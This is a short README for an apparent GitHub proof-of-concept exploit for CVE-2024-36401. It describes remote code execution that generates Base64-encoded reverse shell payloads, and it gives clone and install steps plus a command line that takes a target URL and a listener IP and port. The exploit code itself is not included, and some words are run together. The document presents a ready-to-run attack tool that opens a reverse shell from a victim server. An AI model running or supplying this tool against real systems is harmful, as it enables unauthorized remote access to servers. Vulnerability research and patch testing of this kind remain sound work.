
Proof-of-concept exploit for CVE-2024-36401 enabling remote code execution via HTTP requests with reverse shell payload generation and Base64 encoding.
This repository contains a Proof of Concept (PoC) script for CVE-2024-36401, a vulnerability that can be exploited to gain remote code execution on the target server.
requests libraryClone this repository:
git clone https://github.com/yourusername/CVE-2024-36401-PoC.git
cd CVE-2024-36401-PoC
Install the required Python library:
pip install requests
Ensure type_names.txt is in the same directory as .
rev.pypython3 rev.py -u <target_url> -i <listener_ip> -p <listener_port>